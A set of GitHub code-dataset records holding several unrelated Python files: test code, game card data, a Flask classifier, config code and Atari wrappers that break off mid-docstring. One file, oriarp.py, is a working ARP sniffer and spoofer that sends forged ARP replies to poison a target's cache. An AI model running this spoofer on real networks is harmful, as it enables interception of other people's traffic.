mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Command that has no supported options should not print available options')\n\n help = self.help_with_args(['0_node', '1_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_options()\n self.assertTrue(\n mock_stdout.getvalue().find('Available options') >= 0,\n 'Command that has supported options should print available options')\n\n def test_print_help(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertFalse(mock_stdout.getvalue().find('Invalid command') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertTrue(mock_stdout.getvalue().find('Invalid command') >= 0)\n","repo_name":"googkit/googkit","sub_path":"test/lib/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"32687369500","text":"#!/usr/bin/python3\r\nimport socket\r\nimport struct\r\nimport uuid\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef getsocketinformation():\r\n #create socket and receive all type of packets\r\n a_scoket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\r\n\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n a_scoket.bind((os.listdir('/sys/class/net/')[1], 0))\r\n\r\n return a_scoket\r\n\r\ndef getmac():\r\n List = []\r\n Mymac = uuid.getnode()\r\n count = 0\r\n while(count < 6):\r\n List = [Mymac % 0x100] + List\r\n Mymac //= 0x100\r\n count += 1\r\n return List\r\n\r\ndef getpacketinformation():\r\n arpin = {\r\n 'my_mac' : struct.pack('!6B',*getmac()),\r\n 'my_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_type' : struct.pack('!H', 0x0806)\r\n }\r\n packet = {\r\n\r\n #header\r\n 'target_mac_addr' : struct.pack('!6B',0xFF,0xFF,0xFF,0xFF,0xFF,0xFF),\r\n 'source_mac_addr' : struct.pack('!6B',*getmac()),\r\n 'frame_type' : struct.pack('!H',0x0806),\r\n\r\n #arp body\r\n 'arp_body_hw_type' : struct.pack('!H', 0x0001),\r\n 'arp_body_protocal_type' : struct.pack('!H', 0x0800),\r\n 'arp_body_hw_length' : struct.pack('!B', 0x06),\r\n 'arp_body_protocal_length' : struct.pack('!B', 0x04),\r\n 'arp_body_opcode' : struct.pack('!H', 0x0001),\r\n 'arp_body_source_mac' : struct.pack('!6B',*getmac()),\r\n 'arp_body_source_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_body_target_mac' : struct.pack('!6B',0,0,0,0,0,0),\r\n 'arp_body_target_ip' : ''\r\n }\r\n return packet\r\n\r\ndef receive(my_socket):\r\n my_packet = getpacketinformation()\r\n\r\n frame = my_socket.recvfrom(2048)\r\n header = frame[0][0:14]\r\n arp_body = frame[0][14:42]\r\n\r\n header_temp = struct.unpack(\"!6s6s2s\", header)\r\n arp_body_temp = struct.unpack(\"!2s2s1s1s2s6s4s6s4s\", arp_body)\r\n\r\n my_packet['target_mac_addr'] = binascii.hexlify(header_temp[0],':')\r\n my_packet['source_mac_addr'] = binascii.hexlify(header_temp[1],':')\r\n my_packet['frame_type'] = header_temp[2]\r\n\r\n my_packet['arp_body_opcode'] = arp_body_temp[4]\r\n my_packet['arp_body_source_mac'] = binascii.hexlify(arp_body_temp[5],':')\r\n my_packet['arp_body_source_ip'] = socket.inet_ntoa(arp_body_temp[6])\r\n my_packet['arp_body_target_mac'] = binascii.hexlify(arp_body_temp[7],':')\r\n my_packet['arp_body_target_ip'] = socket.inet_ntoa(arp_body_temp[8])\r\n\r\n return my_packet\r\n\r\ndef listening():\r\n print(\"### ARP sniffer mode ###\")\r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef Listening(ip):\r\n print(\"### ARP sniffer mode ###\")\r\n \r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n #print(_Packet['arp_body_target_ip'])\r\n #receive target or source is \"ip\" only\r\n if _Packet['arp_body_target_ip'] != ip and _Packet['arp_body_source_ip'] != ip:\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef question(ip):\r\n Arp_packet = getpacketinformation()\r\n Arp_socket = getsocketinformation()\r\n\r\n Arp_packet['arp_body_target_ip'] = socket.inet_aton(ip)\r\n\r\n Arp_packet_list = [ i for i in Arp_packet.values() ]\r\n \r\n\r\n\r\n Arp_packet['arp_body_source_ip'] = socket.inet_ntoa(Arp_packet['arp_body_source_ip'])\r\n Arp_packet['arp_body_target_ip'] = socket.inet_ntoa(Arp_packet['arp_body_target_ip'])\r\n\r\n\r\n\r\n Arp_socket.send(b''.join(Arp_packet_list))\r\n \r\n print(\"Get ARP packet - Who has \" + Arp_packet['arp_body_target_ip'] + \" ? Tell \" + Arp_packet['arp_body_source_ip'])\r\n\r\n while True:\r\n Arp_responce = receive(Arp_socket)\r\n\r\n if Arp_responce['frame_type'] != b'\\x08\\x06':\r\n continue\r\n \r\n\r\n if Arp_responce['arp_body_source_ip'] == ip:\r\n print(\"MAC address of \" + Arp_responce['arp_body_source_ip'] + \" is \" + bytes.decode(Arp_responce['arp_body_source_mac']))\r\n break\r\n\r\ndef Spoof(fack_mac , target_ip):\r\n a_scoket = getsocketinformation()\r\n\r\n fack_mac = str.encode(fack_mac)\r\n fack_mac = binascii.unhexlify(fack_mac.replace(b':', b''))\r\n while True:\r\n Arp_request = receive(a_scoket)\r\n\r\n if Arp_request['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if Arp_request['arp_body_opcode'] != b'\\x00\\x01' or Arp_request['arp_body_target_ip'] != target_ip:\r\n continue\r\n print(\"arp request\")\r\n \r\n print(\"Arp request target ip is \" + Arp_request['arp_body_target_ip'])\r\n\r\n print(\"fack arp responce :\")\r\n\r\n fack_arp_responce = getpacketinformation()\r\n \r\n Arp_request['arp_body_source_mac'] = bytes.decode(Arp_request['arp_body_source_mac'])\r\n Arp_request['arp_body_source_mac'] = Arp_request['arp_body_source_mac'].replace(':','')\r\n\r\n fack_arp_responce['target_mac_addr'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n fack_arp_responce['source_mac_addr'] = fack_mac\r\n fack_arp_responce['arp_body_opcode'] = struct.pack('!H', 0x0002)\r\n fack_arp_responce['arp_body_source_mac'] = fack_mac\r\n fack_arp_responce['arp_body_target_ip'] = socket.inet_aton(Arp_request['arp_body_source_ip'])\r\n fack_arp_responce['arp_body_source_ip'] = socket.inet_aton(target_ip)\r\n fack_arp_responce['arp_body_target_mac'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n \r\n \r\n fack_arp_responce_list = [ k for k in fack_arp_responce.values() ]\r\n\r\n a_scoket.send(b''.join(fack_arp_responce_list))\r\n print(\"Send successfull.\")\r\n exit()\r\n\r\n\r\n\r\ndef main(run):\r\n if os.geteuid() != 0:\r\n print(\"ERROR: You must be root to use the tool!\")\r\n exit()\r\n\r\n print(\"[ ARP sniffer and spoof program ]\")\r\n\r\n if run[0] == '-help':\r\n print(\"Format :\")\r\n print(\"1) sudo python3 arp.py -l -a\")\r\n print(\"2) sudo python3 arp.py -l \")\r\n print(\"3) sudo python3 -q \")\r\n print(\"4) sudo python3 \")\r\n\r\n elif run == ['-l','-a']:\r\n listening()\r\n\r\n elif run[0] == '-l':\r\n Listening(run[1])\r\n\r\n elif run[0] == '-q':\r\n question(run[1])\r\n\r\n else:\r\n Spoof(run[0],run[1])\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n\r\n\"\"\"\r\ndef a(n):\r\n code\r\n\r\nb = 10\r\na(b)\r\n\"\"\"\r\n","repo_name":"EnNoYa/EnNoYa.github.io","sub_path":"oriarp.py","file_name":"oriarp.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31807228437","text":"cards = {\n 'adventurer' : {\n 'name':'Adventurer',\n 'set':'Base',\n 'cost':6,\n 'type':'Action',\n 'effects': {\n 'other':'Reveal cards from your deck until you reveal 2 Treasure cards. Put those treasure cards into your hand and discard the other revealed cards'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/adventurer.jpg'\n },\n 'bureaucrat' : {\n 'name':'Bureaucrat',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Gain a Silver card; put it on top of your deck. Each other player reveals a Victory card from their hand and puts it on their deck (or reveals a hand with no Victory cards).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/bureaucrat.jpg'\n },\n 'cellar' : {\n 'name':'Cellar',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'actions':1,\n 'other':'Discard any number of cards. +1 Card per card discarded.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/cellar.jpg'\n },\n 'chancellor' : {\n 'name':'Chancellor',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'coins':2,\n 'other':'You may immediately put your deck into your discard pile.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chancellor.jpg'\n },\n 'chapel' : {\n 'name':'Chapel',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'other':'Trash up to 4 cards from your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chapel.jpg'\n },\n 'council_room' : {\n 'name':'Council Room',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':4,\n 'buys':1,\n 'other':'Each other player draws a card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/councilroom.jpg'\n },\n 'feast' : {\n 'name':'Feast',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash this card. Gain a card costing up to 5.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/feast.jpg'\n },\n 'festival' : {\n 'name':'Festival',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'actions':2,\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/festival.jpg'\n },\n 'gardens' : {\n 'name':'Gardens',\n 'set':'Base',\n 'cost':4,\n 'type':'Victory',\n 'effects': {\n 'other':'Worth 1 Victory Point for every 10 cards in your desk (rounded down).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/gardens.jpg'\n },\n 'laboratory' : {\n 'name':'Laboratory',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':2,\n 'actions':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/laboratory.jpg'\n },\n 'library' : {\n 'name':'Library',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Draw until you have 7 cards in hand. You may set aside any Action cards drawn this way, as you draw them; discard the set aside cards after you finish drawing.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/library.jpg'\n },\n 'market' : {\n 'name':'Market',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'buys':1,\n 'coins':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/market.jpg'\n },\n 'militia' : {\n 'name':'Militia',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'coins':2,\n 'other':'Each other player discards down to 3 cards in their hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/militia.jpg'\n },\n 'mine' : {\n 'name':'Mine',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Treasure card from your hand. Gain a Treasure card costing up to 3 more; put it into your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/mine.jpg'\n },\n 'moat' : {\n 'name':'Moat',\n 'set':'Base',\n 'cost':2,\n 'type':'Action - Reaction',\n 'effects': {\n 'cards':2,\n 'other':'When another player plays an Attack card, you may reveal this from your hand. If you do so, you are unaffected by that Attack.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moat.jpg'\n },\n 'moneylender' : {\n 'name':'Moneylender',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Copper card from your hand. If you do, +3 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moneylender.jpg'\n },\n 'remodel' : {\n 'name':'Remodel',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'efftecs': {\n 'other':'Trash a card from your hand. Gain a card costing up to 2 more than the trashed card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/remodel.jpg'\n },\n 'smithy' : {\n 'name':'Smithy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'cards':3\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/smithy.jpg'\n },\n 'spy' : {\n 'name':'Spy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'other':'Each player (including you) reveals the top card of their deck and either discards it or puts it back, your choice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/spy.jpg'\n },\n 'thief' : {\n 'name':'Thief',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Each other player reveals the top 2 cards of their deck. If they revealed any Treasure cards, they trash one of them that you choose. You may gain any or all of these trashed cards. They discard the other revealed cards.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/thief.jpg'\n },\n 'throne_room' : {\n 'name':'Throne Room',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Choose an Action card in your hand. Play it twice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/throneroom.jpg'\n },\n 'village' : {\n 'name':'Village',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/village.jpg'\n },\n 'witch' : {\n 'name':'Witch',\n 'set':'Base',\n 'cost':5,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':2,\n 'other':'Each other player gains a Curse card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/witch.jpg'\n },\n 'woodcutter' : {\n 'name':'Woodcutter',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/woodcutter.jpg'\n },\n 'workshop' : {\n 'name':'Workshop',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'other':'Gain a card costing up to 4 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/workshop.jpg'\n },\n 'copper' : {\n 'name':'Copper',\n 'set':'Base',\n 'cost':0,\n 'type':'Treasure',\n 'effects': {\n 'coins':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/copper.jpg'\n },\n 'silver' : {\n 'name':'Silver',\n 'set':'Base',\n 'cost':3,\n 'type':'Treasure',\n 'effects': {\n 'coins':2\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/silver.jpg'\n },\n 'gold' : {\n 'name':'Gold',\n 'set':'Base',\n 'cost':6,\n 'type':'Treasure',\n 'effects': {\n 'coins':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/gold.jpg'\n },\n 'estate' : {\n 'name':'Estate',\n 'set':'Base',\n 'cost':2,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/estate.jpg'\n },\n 'duchy' : {\n 'name':'Duchy',\n 'set':'Base',\n 'cost':5,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/duchy.jpg'\n },\n 'province' : {\n 'name':'Province',\n 'set':'Base',\n 'cost':8,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':6\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/province.jpg'\n },\n 'curse' : {\n 'name':'Curse',\n 'set':'Base',\n 'type':'Curse',\n 'effects': {\n 'victorypoints':-1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/curse.jpg'\n },\n}\n\ndecks = {\n 'first-game' : [\n 'cellar',\n 'market',\n 'militia',\n 'mine',\n 'moat',\n 'remodel',\n 'smithy',\n 'village',\n 'woodcutter',\n 'workshop',\n ],\n 'big-money' : [\n 'adventurer',\n 'bureaucrat',\n 'chancellor',\n 'chapel',\n 'feast',\n 'laboratory',\n 'market',\n 'mine',\n 'moneylender',\n 'throne_room',\n ],\n 'interaction' : [\n 'bureaucrat',\n 'chancellor',\n 'council_room',\n 'festival',\n 'library',\n 'militia',\n 'moat',\n 'spy',\n 'thief',\n 'village',\n ],\n 'size-distortion' : [\n 'cellar',\n 'chapel',\n 'feast',\n 'gardens',\n 'laboratory',\n 'thief',\n 'village',\n 'witch',\n 'woodcutter',\n 'workshop',\n ],\n 'village-square' : [\n 'bureaucrat',\n 'cellar',\n 'festival',\n 'library',\n 'market',\n 'remodel',\n 'smithy',\n 'throne_room',\n 'village',\n 'woodcutter',\n ],\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaron-zeisler/dominion","sub_path":"dominion/dominion_data.py","file_name":"dominion_data.py","file_ext":"py","file_size_in_byte":12016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16851974383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 18:15:39 2019\n\n@author: Mr Mejia\n\"\"\"\n\nfrom flask import Flask, jsonify\nfrom sklearn.externals import joblib\nfrom iswai.sensor_mongodb import SensorMongoDB\n\napp = Flask(__name__)\n\n@app.route('/classify//')\ndef classify(hm, tm):\n \n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n # Make predictions on request data\n data = [hm, tm]\n predictions = model.predict([data])\n \n # return the classification in JSON format\n return jsonify({'clima':predictions[0]})\n\n@app.route('/classify', methods=['POST'])\ndef classify_json():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n content = request.get_json()\n \n data = []\n for row in content:\n tm = row['tm']\n hm = row['hm']\n item = [tm, hm]\n data.append(item)\n \n # Make Predictions\n predictions = model.predict(data)\n \n # Return the classification in JSON format\n return jsonify(clima=predictions[0])\n\n\n@app.route('/list', methods=['GET'])\ndef list():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n sensor_mongodb = SensorMongoDB()\n dataframe = sensor_mongodb.getDataframe()\n print(dataframe)\n \n json_data = []\n \n for index, row in dataframe.iterrows():\n tm = row['temperatura']\n hm = row['humedad']\n item = [tm, hm]\n \n category = model.predict([item])[0]\n json_item = {'tm':tm, 'hm':hm, 'clima':category}\n json_data.append(json_item)\n \n return jsonify(Tiempo=json_data)\n\nif __name__ == '__main__':\n app.run()","repo_name":"DuvanSGF/Sifunciona","sub_path":"DataScienceII/ClasesGithub/Nueva carpeta/sensor/iswai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12657131896","text":"x=int(input())\nflag=True\ncnt=0\nwhile flag:\n for i in range(2,int(x**0.5)):\n if x%i!=0:\n continue\n cnt=1\n break\n if cnt==0:\n print(x)\n exit()\n cnt=0\n x+=1","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc149/abc149_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30285600311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : lhr (airhenry@gmail.com)\n# @Link : http://about.me/air.henry\n\n\nfrom general import gs\nlog=gs.get_logger(__name__,debug=False)\n\nfrom general.gs import cfg,types\nPortType = types.Integer(1, 65535)\n\nOPTS = [\n cfg.StrOpt('redis_server',\n default='localhost',\n help='redis server to connect to '),\n cfg.Opt('redis_port',\n type=PortType,\n default=6379,\n help='redis port number to connect to'),\n cfg.StrOpt('mongo_server',\n default='localhost',\n help='mongo server to connect to '),\n cfg.Opt('mongo_port',\n type=PortType,\n default=27017,\n help='mongo port number to connect to'),\n ]\n\n\ngs.init(__file__,OPTS)\n\n# log=gs.get_logger(__name__,debug=gs.CONF.debug)\n\nlog.debug(\"gs loaded, root is \"+gs.CONF.root_package_name)\n","repo_name":"lhrkkk/general","sub_path":"general/init_gs.py","file_name":"init_gs.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14254706753","text":"import os\nimport pandas as pd\nimport numpy as np\nimport json\nfrom objects import Vertiport, Pad, Aircraft\nfrom copy import deepcopy\n\n\ndef create_vertiport(file_name: str) -> (list, int):\n \"\"\"\n This function creates vertiport objects alongside their pads.\n\n Args:\n file_name (str): vertiport file name that contains its location, pads and number of stands.\n\n Returns:\n vertiport_objects (list): list of built vertiport objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n i = 1\n root_path = os.getcwd() + f\"\\\\{file_name}.xlsx\"\n excel_data = pd.ExcelFile(root_path)\n sheet_names = excel_data.sheet_names\n excel_data = pd.read_excel(root_path, sheet_name=sheet_names[0])\n data_dict = excel_data.to_dict(orient='dict')\n vertiport_objects = []\n vertiport_created = False\n for index in data_dict['Name']:\n if type(data_dict['Name'][index]) == str:\n if vertiport_created:\n vertiport_obj.pads = pads\n vertiport_objects.append(deepcopy(vertiport_obj))\n vertiport_obj = Vertiport(i, [], [], json.loads(data_dict['Position'][index]), data_dict['Name'][index], data_dict['Capacity'][index])\n vertiport_created = True\n pads = []\n i += 1\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n elif np.isnan(data_dict['Name'][index]):\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n vertiport_obj.pads = pads\n # vertiport_obj.aircrafts = aircrafts\n vertiport_objects.append(deepcopy(vertiport_obj))\n last_id = i\n return vertiport_objects, last_id\n\n\ndef create_aircrafts(aircraft_schedule_data: dict, last_id: int) -> (list, int):\n \"\"\"\n This function creates aircraft objects demand_schedule_data\n\n Args:\n aircraft_schedule_data (dict): a dictionary that contains every aircraft's \n arrival time.\n last_id (int): previous last objects id, to be used for creating other objects.\n\n Returns:\n demands (list): list of built aircraft objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n aircrafts = []\n for i in range(len(aircraft_schedule_data['aircraft_start_time'])):\n aircrafts.append(Aircraft(last_id, 'scheduled', [], aircraft_schedule_data['aircraft_start_time'][i]))\n last_id += 1\n return aircrafts, last_id","repo_name":"moahmmadalizade91/max_time_on_vertiport","sub_path":"create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38916287873","text":"\"\"\"\n Converting individual lives in the game into separate episodes. In\n general, an episode contains all the steps from the beginning of the game\n until the \"Game over\" screen appears?, which can last for thousands of\n game steps (observations and actions). Usually, in arcade games, the\n player is given several lives, which provide several attempts in the\n game. This transformation splits a full episode into individual small\n episodes for every life that a player has. Not all games support this\n feature (for example, Pong doesn't), but for the supported environments,\n it usually helps to speed up convergence as our episodes become shorter.\n In the beginning of the game, performing a random amount (up to 30) of\n no-op actions. This should stabilize training, but there is no proper\n explanation why it is the case.\n Making an action decision every K steps, where K is usually 4 or 3. On\n intermediate frames, the chosen action is simply repeated. This allows\n training to speed up significantly, as processing every frame with a\n neural network is quite a demanding operation, but the difference\n between consequent frames is usually minor.\n Taking the maximum of every pixel in the last two frames and using it\n as an observation. Some Atari games have a flickering effect, which is\n due to the platform's limitation (Atari has a limited amount of sprites\n that can be shown on a single frame). For a human eye, such quick\n changes are not visible, but they can confuse neural networks.\n Pressing FIRE in the beginning of the game. Some games (including\n Pong and Breakout) require a user to press the FIRE button to start the\n game. In theory, it's possible for a neural network to learn to press FIRE\n itself, but it will require much more episodes to be played. So, we press\n FIRE in the wrapper.\n Scaling every frame down from 210 × 160, with three color frames, into\n a single-color 84 × 84 image. Different approaches are possible. For\n example, the DeepMind paper describes this transformation as taking\n the Y-color channel from the YCbCr color space and then rescaling the\n full image to an 84 × 84 resolution. Some other researchers do grayscale\n transformation, cropping non-relevant parts of the image and then\n scaling down. In the Baselines repository (and in the following example\n code), the latter approach is used.\n Stacking several (usually four) subsequent frames together to give the\n network the information about the dynamics of the game's objects.\n Clipping the reward to −1, 0, and 1 values. The obtained score can vary\n wildly among the games. For example, in Pong you get a score of 1 for\n every ball that your opponent passes behind you. However, in some\n games, like KungFu, you get a reward of 100 for every enemy killed.\n This spread in reward values makes our loss have completely different\n scales between the games, which makes it harder to find common\n hyperparameters for a set of games. To fix this, reward just gets clipped\n to the range [−1...1].\n Converting observations from unsigned bytes to float32 values. The\n screen obtained from the emulator is encoded as a tensor of bytes with\n values from 0 to 255, which is not the best representation for a neural\n network. So, we need to convert the image into floats and rescale the\n values to the range [0.0…1.0].\n\"\"\"\n\nimport cv2\nimport gym\nimport gym.spaces\nimport numpy as np\nimport collections\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env=None):\n super(FireResetEnv, self).__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset()\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset()\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset()\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env=None, skip=4):\n \"\"\"\n Return only every skip frame\n :param env:\n :param skip:\n \"\"\"\n super(MaxAndSkipEnv, self).__init__(env)\n self._obs_buffer = collections.deque(maxlen=2)\n self._skip = skip\n\n def step(self, action):\n total_reward = 0.0\n done = None\n info = None\n for _ in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n self._obs_buffer.append(obs)\n total_reward += reward\n if done:\n break\n max_frame = np.max(np.stack(self._obs_buffer), axis=0)\n return max_frame, total_reward, done, info\n\n def _reset(self):\n self._obs_buffer.clear()\n obs = self.env.reset()\n self._obs_buffer.append(obs)\n return obs\n\n\nclass ProcessFrame84(gym.ObservationWrapper):\n \"\"\"\n The goal of this wrapper is to convert input observations from the emulator,\n which normally has a resolution of 210 × 160 pixels with RGB color\n channels, to a grayscale 84 × 84 image. It does this using a colorimetric\n grayscale conversion (which is closer to human color perception than a\n simple averaging of color channels), resizing the image and cropping the top\n and bottom parts of the result.\n \"\"\"\n def __init__(self, env=None):\n super(ProcessFrame84, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1),\n dtype=np.uint8)\n\n def observation(self, observation):\n return ProcessFrame84.process(observation)\n\n @staticmethod\n def process(frame):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, (210, 160, 3)).astype(np.float32)\n else:\n assert False, \"Unknown resolution\"\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 \\\n + img[:, :, 2] * .114\n resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)\n x_t = resized_screen[18:102, :]\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass BufferWrapper(gym.ObservationWrapper):\n \"\"\"\n This class creates a stack of subsequent frames along the first dimension and\n returns them as an observation. 